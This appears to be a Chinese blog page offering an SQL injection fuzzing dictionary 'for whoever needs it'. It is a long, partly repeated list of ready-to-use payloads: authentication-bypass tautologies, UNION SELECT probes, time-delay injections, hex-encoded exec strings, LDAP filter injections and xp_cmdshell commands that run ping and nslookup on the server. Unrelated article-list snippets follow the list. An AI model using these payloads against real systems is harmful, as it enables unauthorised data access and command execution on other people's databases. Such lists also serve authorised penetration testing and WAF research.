需要的自取

'

"

#

-

--

' --

--';

' ;

= '

= ;

= --

\x23

\x27

\x3D \x3B'

\x3D \x27

\x27\x4F\x52 SELECT *

\x27\x6F\x72 SELECT *

'or select *

admin'--

';shutdown--

<>"'%;)(&+

' or ''='

' or 'x'='x

" or "x"="x

') or ('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

"' or 1 --'"

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

" or 1=1 or ""="

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

'hi' or 'x'='x';

@variable

,@variable

PRINT

PRINT @@variable

select

insert

as

or

procedure

limit

order by

asc

desc

delete

update

distinct

having

truncate

replace

like

handler

bfilename

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

exec xp

exec sp

'; exec master..xp_cmdshell

'; exec xp_regread

t'exec master..xp_cmdshell 'nslookup www.google.com'--

--sp_password

\x27UNION SELECT

' UNION SELECT

' UNION ALL SELECT

' or (EXISTS)

' (select top 1

'||UTL_HTTP.REQUEST

1;SELECT%20*

to_timestamp_tz

tz_offset

&lt;&gt;&quot;'%;)(&amp;+

'%20or%201=1

%27%20or%201=1

%20$(sleep%2050)

%20'sleep%2050'

char%4039%41%2b%40SELECT

&apos;%20OR

'sqlattempt1

(sqlattempt2)

|

%7C

*|

%2A%7C

*(|(mail=*))

%2A%28%7C%28mail%3D%2A%29%29

*(|(objectclass=*))

%2A%28%7C%28objectclass%3D%2A%29%29

(

%28

)

%29

&

%26

!

%21

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y

/

//

//*

*/*

'

' and '' like '

' AnD '' like '

' or '' like '

' and '' like '%

' aND '' like '%

' and '' like ''--

' and 2>1--

' and 2>3--

') and ('x'='x

) and (1=1

'or''='

'or'='or'

a' or 1=1--

"a"" or 1=1--"

 or a = a

a' or 'a' = 'a

1 or 1=1

a' waitfor delay '0:0:10'--

1 waitfor delay '0:0:10'--

declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)

declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)

declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)

declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)

a'

?

' or 1=1

‘ or 1=1 --

x' AND userid IS NULL; --

x' AND email IS NULL; --

anything' OR 'x'='x

x' AND 1=(SELECT COUNT(*) FROM tabname); --

x' AND members.email IS NULL; --

x' OR full_name LIKE '%Bob%

23 OR 1=1

'; exec master..xp_cmdshell 'ping 172.10.1.255'--

'

'%20or%20''='

'%20or%20'x'='x

%20or%20x=x

')%20or%20('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

 or 0=0 #"

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

' or 1 --'

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

 or 1=1 or ""=

' or a=a--

 or a=a

') or ('a'='a

) or (a=a

hi or a=a

hi or 1=1 --"

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

"hi"") or (""a""=""a"

'hi' or 'x'='x';

@variable

,@variable

PRINT

PRINT @@variable

select

insert

as

or

procedure

limit

order by

asc

desc

delete

update

distinct

having

truncate

replace

like

handler

bfilename

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

exec xp

exec sp

'; exec master..xp_cmdshell

'; exec xp_regread

t'exec master..xp_cmdshell 'nslookup www.google.com'--

--sp_password

\x27UNION SELECT

' UNION SELECT

' UNION ALL SELECT

' or (EXISTS)

' (select top 1

'||UTL_HTTP.REQUEST

1;SELECT%20*

to_timestamp_tz

tz_offset

<>"'%;)(&+

'%20or%201=1

%27%20or%201=1

%20$(sleep%2050)

%20'sleep%2050'

char%4039%41%2b%40SELECT

&apos;%20OR

'sqlattempt1

(sqlattempt2)

|

%7C

*|

%2A%7C

*(|(mail=*))

%2A%28%7C%28mail%3D%2A%29%29

*(|(objectclass=*))

%2A%28%7C%28objectclass%3D%2A%29%29

(

%28

)

%29

&

%26

!

%21

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y

/

//

//*

*/*

a' or 3=3--

"a"" or 3=3--"

' or 3=3

‘ or 3=3 --

SQL注入Fuzzing字典的更多相关文章

  1. SQL注入fuzz字典

    length Length + handler likeLiKe selectSeleCT sleepSLEEp databaseDATABASe delete having oroR asAs -~ ...

  2. 深入理解SQL注入绕过WAF和过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  3. DAY5 DVWA之SQL注入演练(low)

    1.设置 把安全等级先调整为low,让自己获得点信心,免得一来就被打脸. 2.测试和分析页面的功能       这里有一个输入框 根据上面的提示,输入用户的id.然后我们输入之后,发现它返回了关于这个 ...

  4. 深入了解SQL注入绕过waf和过滤机制

    知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 ...

  5. 见招拆招:绕过WAF继续SQL注入常用方法

    Web Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断绕过.WAF bypass是一个永恒的话题,不少基友也总结了很多奇技怪招.那今天我在这里做个小小的扫盲吧.先来说说 ...

  6. 仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell

    最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是 5173平台交易的网站,叫我直接把号的信息填上去然后填 ...

  7. 深入理解SQL注入绕过WAF与过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  8. 『SQL注入』 User-Agent 手工注入的探测与利用分析

    原理很简单:后台在接收UA时没有对UA做过滤,也没有PDO进行数据交互(实际PDO是非常有必要的),导致UA中有恶意代码,最终在数据库中执行. Bug 代码: 本地顺手打了一个环境,Bug 代码部分: ...

  9. 实验吧_简单的sql注入_1、2、3

    简单的sql注入1 看着这个简单的界面,一时间没有特别好的思路,先输入一个1',发生了报错 初步猜测这是一个字符型的注入,他将我们输入的语句直接当成sql语句执行了,按题目的意思后面肯定过滤了很多注入 ...

  10. DVWA 黑客攻防演练(八)SQL 注入 SQL Injection

    web 程序中离不开数据库,但到今天 SQL注入是一种常见的攻击手段.如今现在一些 orm 框架(Hibernate)或者一些 mapper 框架( iBatis)会对 SQL 有一个更友好的封装,使 ...

随机推荐

  1. WEBGpu最佳实践之BindGroup

    介绍 在WebGPU中,资源通过GPUBindGroup结构传递给着色器,与支持它的布局定义(GPUBindGroupLayout和GPUPipelineLayout)以及着色器中绑定组的声明一起.这 ...

  2. HBuilderX内置终端无法使用不能输入

    找到HBuilderX的目录打开plugins\builtincef3terminal\script找到main.js用记事本或其他什么打开他 把这部分代码替换成这个再重启hbuilderX就可以了 ...

  3. Vue之基础事件

    1.基础事件,先弹框试试 <!DOCTYPE html> <html lang="en"> <head> <meta charset=&q ...

  4. Unity禁止C#自动编译

    基于unity2017\2020版本 using System; using System.Linq; using System.Reflection; using UnityEditor; usin ...

  5. trafilatura 网页解析原理分析

    trafilatura 介绍 Trafilatura是一个Python包和命令行工具,用于收集网络上的文本.其主要应用场景包括网络爬虫下载和网页解析等. 今天我们不讨论爬虫和抓取,主要看他的数据解析是 ...

  6. RLHF · PBRL | RUNE:鼓励 agent 探索 reward model 更不确定的 (s,a)

    论文题目: Reward uncertainty for exploration in preference-based reinforcement learning,是 ICLR 2022 的文章, ...

  7. dfs:马踏棋盘

    1 #include<stdio.h> 2 #include<time.h> 3 4 #define X 8 5 #define Y 8 6 7 int chess[X][Y] ...

  8. java读取照片Exif信息到实体类

    前言 1.总共读出来了228个参数信息,但是我挑选了36个我认为比较有价值的参数,弄成了实体类 (其实是因为很多参数我看不明白是啥意思) 2.为了方便,所以实体类里我直接用中文字段了 效果图 导入依赖 ...

  9. HBase|idea使用hbase进行简单的DDL增删改查

    老师要测试什么的,所以我想练习一下,顺便记录在博客里,如有错误,敬请指正,谢谢!!! idea连接hbase 首先确保你可以打开Hbase http://192.168.40.100:16010 查看 ...

  10. WPF应用框架中工作流模块的介绍

    在前面的随笔,我对我们开发的审批工作流做了不少的介绍,其中有包括WInform的.Vue+Element.Bootstrap Asp.net的,在各个框架上,我们都尽量争取界面能够一致化,以便客户能够 ...